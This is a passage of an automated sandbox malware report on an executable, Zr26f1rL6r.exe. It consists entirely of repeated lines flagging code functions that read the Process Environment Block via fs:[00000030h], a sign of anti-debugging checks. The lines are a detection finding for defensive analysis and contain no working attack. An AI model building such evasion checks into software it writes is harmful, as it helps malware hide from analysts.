Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h] 10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h] 10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h] 10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h] 10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DCF00 mov eax, dword ptr fs:[00000030h] 10_2_1E8DCF00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DCF00 mov eax, dword ptr fs:[00000030h] 10_2_1E8DCF00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h] 10_2_1E93FF03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h] 10_2_1E93FF03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h] 10_2_1E93FF03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E948F3C mov eax, dword ptr fs:[00000030h] 10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E948F3C mov eax, dword ptr fs:[00000030h] 10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E948F3C mov ecx, dword ptr fs:[00000030h] 10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E948F3C mov ecx, dword ptr fs:[00000030h] 10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h] 10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h] 10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h] 10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h] 10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BFF30 mov edi, dword ptr fs:[00000030h] 10_2_1E8BFF30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97AF50 mov ecx, dword ptr fs:[00000030h] 10_2_1E97AF50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97BF4D mov eax, dword ptr fs:[00000030h] 10_2_1E97BF4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E916F70 mov eax, dword ptr fs:[00000030h] 10_2_1E916F70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994F7C mov eax, dword ptr fs:[00000030h] 10_2_1E994F7C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97EF66 mov eax, dword ptr fs:[00000030h] 10_2_1E97EF66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h] 10_2_1E8BEF79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h] 10_2_1E8BEF79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h] 10_2_1E8BEF79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BBF70 mov eax, dword ptr fs:[00000030h] 10_2_1E8BBF70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C1F70 mov eax, dword ptr fs:[00000030h] 10_2_1E8C1F70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAF72 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAF72
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97FC95 mov eax, dword ptr fs:[00000030h] 10_2_1E97FC95
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E969C98 mov ecx, dword ptr fs:[00000030h] 10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h] 10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h] 10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h] 10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E943C80 mov ecx, dword ptr fs:[00000030h] 10_2_1E943C80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C7C95 mov eax, dword ptr fs:[00000030h] 10_2_1E8C7C95
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C7C95 mov eax, dword ptr fs:[00000030h] 10_2_1E8C7C95
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F9CCF mov eax, dword ptr fs:[00000030h] 10_2_1E8F9CCF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h] 10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h] 10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E953CD4 mov ecx, dword ptr fs:[00000030h] 10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h] 10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h] 10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E945CD0 mov eax, dword ptr fs:[00000030h] 10_2_1E945CD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CFCC9 mov eax, dword ptr fs:[00000030h] 10_2_1E8CFCC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8B6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8B6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8B6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994CD2 mov eax, dword ptr fs:[00000030h] 10_2_1E994CD2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F6CC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8F6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E8CDF mov eax, dword ptr fs:[00000030h] 10_2_1E8E8CDF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E8CDF mov eax, dword ptr fs:[00000030h] 10_2_1E8E8CDF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h] 10_2_1E8DDCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h] 10_2_1E8DDCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h] 10_2_1E8DDCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FCCD1 mov ecx, dword ptr fs:[00000030h] 10_2_1E8FCCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FCCD1 mov eax, dword ptr fs:[00000030h] 10_2_1E8FCCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FCCD1 mov eax, dword ptr fs:[00000030h] 10_2_1E8FCCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93CCF0 mov ecx, dword ptr fs:[00000030h] 10_2_1E93CCF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7CF1 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7CF1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E940CEE mov eax, dword ptr fs:[00000030h] 10_2_1E940CEE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3CF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3CF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3CF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3CF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EECF3 mov eax, dword ptr fs:[00000030h] 10_2_1E8EECF3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EECF3 mov eax, dword ptr fs:[00000030h] 10_2_1E8EECF3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E957CE8 mov eax, dword ptr fs:[00000030h] 10_2_1E957CE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h] 10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h] 10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h] 10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h] 10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E985C38 mov eax, dword ptr fs:[00000030h] 10_2_1E985C38
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E985C38 mov ecx, dword ptr fs:[00000030h] 10_2_1E985C38
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C20 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h] 10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h] 10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h] 10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E957C38 mov eax, dword ptr fs:[00000030h] 10_2_1E957C38
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F4C3D mov eax, dword ptr fs:[00000030h] 10_2_1E8F4C3D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B8C3D mov eax, dword ptr fs:[00000030h] 10_2_1E8B8C3D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994C59 mov eax, dword ptr fs:[00000030h] 10_2_1E994C59
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E943C57 mov eax, dword ptr fs:[00000030h] 10_2_1E943C57
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BDC40 mov eax, dword ptr fs:[00000030h] 10_2_1E8BDC40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C40 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBC6E mov eax, dword ptr fs:[00000030h] 10_2_1E8FBC6E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBC6E mov eax, dword ptr fs:[00000030h] 10_2_1E8FBC6E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCC68 mov eax, dword ptr fs:[00000030h] 10_2_1E8BCC68
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h] 10_2_1E8C0C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h] 10_2_1E8C0C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h] 10_2_1E8C0C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h] 10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h] 10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h] 10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h] 10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h] 10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCD8A mov eax, dword ptr fs:[00000030h] 10_2_1E8BCD8A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCD8A mov eax, dword ptr fs:[00000030h] 10_2_1E8BCD8A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C6D91 mov eax, dword ptr fs:[00000030h] 10_2_1E8C6D91
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B6DA6 mov eax, dword ptr fs:[00000030h] 10_2_1E8B6DA6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F2DBC mov eax, dword ptr fs:[00000030h] 10_2_1E8F2DBC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F2DBC mov ecx, dword ptr fs:[00000030h] 10_2_1E8F2DBC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C7DB6 mov eax, dword ptr fs:[00000030h] 10_2_1E8C7DB6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BDDB0 mov eax, dword ptr fs:[00000030h] 10_2_1E8BDDB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994DA7 mov eax, dword ptr fs:[00000030h] 10_2_1E994DA7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97ADD6 mov eax, dword ptr fs:[00000030h] 10_2_1E97ADD6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97ADD6 mov eax, dword ptr fs:[00000030h] 10_2_1E97ADD6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B8DCD mov eax, dword ptr fs:[00000030h] 10_2_1E8B8DCD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h] 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EFDE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EFDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BEDFA mov eax, dword ptr fs:[00000030h] 10_2_1E8BEDFA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98CDEB mov eax, dword ptr fs:[00000030h] 10_2_1E98CDEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98CDEB mov eax, dword ptr fs:[00000030h] 10_2_1E98CDEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h] 10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h] 10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h] 10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h] 10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h] 10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h] 10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E0D01 mov eax, dword ptr fs:[00000030h] 10_2_1E8E0D01
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94CD00 mov eax, dword ptr fs:[00000030h] 10_2_1E94CD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94CD00 mov eax, dword ptr fs:[00000030h] 10_2_1E94CD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8ECD10 mov eax, dword ptr fs:[00000030h] 10_2_1E8ECD10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8ECD10 mov ecx, dword ptr fs:[00000030h] 10_2_1E8ECD10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97BD08 mov eax, dword ptr fs:[00000030h] 10_2_1E97BD08
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97BD08 mov eax, dword ptr fs:[00000030h] 10_2_1E97BD08
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E958D0A mov eax, dword ptr fs:[00000030h] 10_2_1E958D0A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BFD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8BFD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov ecx, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h] 10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h] 10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h] 10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h] 10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h] 10_2_1E8DDD4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h] 10_2_1E8DDD4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h] 10_2_1E8DDD4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941D5E mov eax, dword ptr fs:[00000030h] 10_2_1E941D5E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B9D46 mov eax, dword ptr fs:[00000030h] 10_2_1E8B9D46
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B9D46 mov eax, dword ptr fs:[00000030h] 10_2_1E8B9D46
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B9D46 mov ecx, dword ptr fs:[00000030h] 10_2_1E8B9D46
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994D4B mov eax, dword ptr fs:[00000030h] 10_2_1E994D4B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93CD40 mov eax, dword ptr fs:[00000030h] 10_2_1E93CD40
